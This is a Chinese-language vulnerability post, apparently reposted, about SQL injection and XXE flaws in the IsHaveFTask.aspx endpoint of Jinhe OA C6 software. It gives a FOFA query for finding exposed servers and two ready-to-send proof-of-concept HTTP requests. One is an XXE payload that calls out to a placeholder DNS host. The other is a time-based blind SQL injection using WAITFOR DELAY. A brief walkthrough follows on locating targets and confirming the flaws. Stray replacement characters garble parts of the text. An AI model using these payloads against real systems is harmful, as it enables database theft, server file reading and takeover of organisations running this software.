漏洞說明:
金和網(wǎng)絡(luò)是專業(yè)信息化服務(wù)商,為城市監(jiān)管部門提供了互聯(lián)網(wǎng)+監(jiān)管解決方案,為企事業(yè)單位提供組織協(xié)同OA系統(tǒng)開發(fā)平臺,電子政務(wù)一體化平臺,智慧電商平臺等服務(wù)。金和OA C6 IsHaveFTask.aspx 接口處存在SQL注入漏洞�����、XXE漏洞�����,攻擊者可以利用 SQL 注入漏洞獲取數(shù)據(jù)庫中的信息(例如,管理員后臺密碼�、站點(diǎn)的用戶個(gè)人信息)之外,還可以通過XXE漏洞讀取服務(wù)器上敏感文件或探測內(nèi)網(wǎng)服務(wù)信息����,甚至在高權(quán)限的SQL注入情況可向服務(wù)器中寫入木馬,進(jìn)一步獲取服務(wù)器系統(tǒng)權(quán)限�����。
漏洞類型:
XXE和數(shù)據(jù)注入
漏洞特征:
FOFA:app="金和網(wǎng)絡(luò)-金和OA"
POC:
xxePoc
POST /c6/Jhsoft.Web.dailytaskmanage/IsHaveFTask.aspx/ HTTP/1.1Host: xxx.comContent-Type: application/xmlContent-Length: 134
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://DNSURL">%remote;]><root/>
時(shí)間盲注Poc
POST /c6/Jhsoft.Web.dailytaskmanage/IsHaveFTask.aspx/ HTTP/1.1Host: xxxx.comContent-Type: application/xmlContent-Length: 97
<root> <Task> <TaskIDList>3);WAITFOR DELAY'0:0:5'-- </TaskIDList> </Task></root>
滲透過程:
通過漏洞特征在FOFA找到目標(biāo)
通過xxepoc��,查詢到dnslog有記錄
通過時(shí)間盲注poc,觀察到結(jié)果返回時(shí)間>5000
閱讀原文:原文鏈接
該文章在 2025/7/18 10:40:15 編輯過
400 186 1886
